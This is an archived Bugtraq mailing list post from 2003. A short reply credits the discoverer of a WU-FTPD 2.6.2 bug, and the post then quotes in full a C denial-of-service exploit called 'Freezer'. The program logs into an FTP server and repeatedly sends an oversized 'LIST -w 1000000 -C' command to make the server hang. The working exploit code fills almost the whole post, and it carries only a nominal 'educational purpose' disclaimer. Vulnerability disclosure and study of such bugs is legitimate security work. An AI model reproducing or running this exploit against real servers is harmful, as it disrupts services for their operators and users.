lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 01 Nov 2003 09:05:11 -0700
From: Rossen Petrov <rpetrov@....net>
To: bugtraq@...urityfocus.com
Subject: Re: WU-FTPD 2.6.2 Freezer


let's not forget to give credit where credit is due. the bug was discovered 
by Georgi Guninski and is documented in his 10/22/03 advisory at 
http://www.guninski.com/binls.html

Rossen

At 07:55 31.10.2003 you wrote:


>http://www.rosiello.org
>
>Vulnerabilities Section.
>
>
>
>
>
>/*
>
>*
>
>*                 http://www.rosiello.org
>
>*                  (c) Rosiello Security
>
>*
>
>* Copyright Rosiello Security 2003
>
>* All Rights reserved.
>
>*
>
>* Tested on Red Hat 9.0
>
>*
>
>* Author: Angelo Rosiello
>
>* Mail  : angelo@...iello.org
>
>* URL   : http://www.rosiello.org
>
>*
>
>* This software is only for educational purpose.
>
>* Do not use it against machines different from yours.
>
>* Respect law.
>
>*
>
>*/
>
>
>
>#include <stdio.h>
>
>#include <sys/types.h>
>
>#include <sys/socket.h>
>
>#include <netinet/in.h>
>
>#include <string.h>
>
>
>
>void addr_initialize( );
>
>void usage( );
>
>
>
>int main( int argc, char **argv )
>
>{
>
>         int i, sd, PORT, loop, error;
>
>         char user[30], password[30], ch;
>
>         struct sockaddr_in server_addr;
>
>
>
>         fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
>
>         fprintf( stdout, "http://www.rosiello.org\n" );
>
>         fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );
>
>
>
>         if( argc != 6 ) usage( argv[0] );
>
>
>
>         if( strlen( argv[3] ) > 20 ) exit( 0 );
>
>         if( strlen( argv[4] ) > 20 ) exit( 0 );
>
>
>
>         sprintf( user, "USER %s\n", argv[3] );
>
>         sprintf( password, "PASS %s\n", argv[4] );
>
>
>
>         PORT = atoi( argv[2] );
>
>         loop = atoi( argv[5] );
>
>
>
>         addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
>
>         sd = socket( AF_INET, SOCK_STREAM, 0 );
>
>
>
>         error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( 
> server_addr ));
>
>         if( error != 0 )
>
>         {
>
>                 perror( "Something wrong with the connection" );
>
>                 exit( 0 );
>
>         }
>
>
>
>         while ( ch != '\n' )
>
>         {
>
>                 recv( sd, &ch, 1, 0);
>
>                 printf("%c", ch );
>
>         }
>
>
>
>         ch = '\0';
>
>
>
>         printf( "Connection executed, now waiting to log in...\n" );
>
>
>
>         printf( "%s", user );
>
>
>
>         send( sd, user, strlen( user ), 0 );
>
>         while ( ch != '\n' )
>
>         {
>
>                 recv( sd, &ch, 1, 0);
>
>                 printf("%c", ch );
>
>         }
>
>         printf( "%s", password );
>
>
>
>         ch = '\0';
>
>
>
>         send( sd, password, strlen( password ), 0 );
>
>         while ( ch != '\n' )
>
>         {
>
>                 recv( sd, &ch, 1, 0);
>
>                 printf("%c", ch );
>
>         }
>
>
>
>         printf( "Sending the DoS query\n" );
>
>         for( i=0; i<loop; i++ )
>
>         {
>
>                 write( sd, "LIST -w 1000000 -C\n", 19 );
>
>         }
>
>         printf( "All done\n" );
>
>         close( sd );
>
>         return 0;
>
>}
>
>
>
>void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
>
>{
>
>         address -> sin_family = AF_INET;
>
>         address -> sin_port = htons((u_short)port);
>
>         address -> sin_addr.s_addr = IPaddr;
>
>}
>
>
>
>void usage( char *program )
>
>{
>
>         fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", 
> program);
>
>         exit(0);
>
>}





Powered by blists - more mailing lists